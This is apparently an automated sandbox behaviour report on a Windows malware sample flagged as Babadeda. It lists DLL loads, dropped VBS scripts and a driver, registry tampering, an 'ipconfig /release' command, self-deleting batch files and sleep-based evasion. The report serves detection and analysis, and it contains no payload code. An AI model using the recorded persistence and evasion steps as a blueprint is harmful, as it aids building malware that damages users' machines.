                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\msg.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\msg.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\msg.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: version.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: mlang.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: edputil.dll
                  Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
                  Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
                  Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\explorer.exeSection loaded: slc.dll
                  Source: C:\Windows\explorer.exeSection loaded: sppc.dll
                  Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
                  Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
                  Source: C:\Windows\explorer.exeSection loaded: cscui.dll
                  Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\explorer.exeSection loaded: icu.dll
                  Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dll
                  Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                  Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
                  Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: acgenral.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: ninput.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: msftedit.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: uiribbon.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: sti.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: wiatrace.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: atlthunk.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\mspaint.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\taskkill.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\mspaint.exeFile opened: C:\Windows\system32\MSFTEDIT.DLL
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\calc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

                  Data Obfuscation

                  barindex
                  Yara detected Babadeda
                  Source: Yara matchFile source: ADZP 20 Complex.exe, type: SAMPLE
                  Source: Yara matchFile source: 37.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 47.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 47.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.ADZP 20 Complex.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\Desktop\Twain_20.dll, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\Desktop\Twain_20.dll, type: DROPPED
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040ADD6
                  Source: ADZP 20 Complex.exeStatic PE information: section name: .code
                  Source: Twain_20.dll.2.drStatic PE information: section name: .code
                  Source: Twain_20.dll0.2.drStatic PE information: section name: .code

                  Persistence and Installation Behavior

                  barindex
                  Command shell drops VBS files
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\ErrorCritico.vbsJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Advertencia.vbsJump to behavior
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Informacion.vbsJump to behavior
                  Sample is not signed and drops a device driver
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\virus.sysJump to behavior
                  Uses cmd line tools excessively to alter registry or file data
                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                  Uses ipconfig to lookup or modify the Windows network settings
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /release
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Twain_20.dllJump to dropped file
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dllJump to dropped file
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\Twain_20.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Self deletion via cmd or bat file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile created: C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.batJump to dropped file
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeWindow / User API: threadDelayed 2832Jump to behavior
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 781Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeWindow / User API: threadDelayed 2622
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeWindow / User API: threadDelayed 1711
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeWindow / User API: threadDelayed 2488
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7348Thread sleep count: 2622 > 30
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7532Thread sleep count: 1711 > 30
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe TID: 7896Thread sleep count: 2488 > 30
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeThread sleep count: Count: 2832 delay: -10Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeThread sleep count: Count: 2622 delay: -10
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeThread sleep count: Count: 1711 delay: -10
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeThread sleep count: Count: 2488 delay: -10
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.tmpJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\mspaint.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040ADD6
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00409FD0 SetUnhandledExceptionFilter,0_2_00409FD0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 0_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409FB0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00409FD0 SetUnhandledExceptionFilter,30_2_00409FD0
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeCode function: 30_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,30_2_00409FB0
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmdJump to behavior
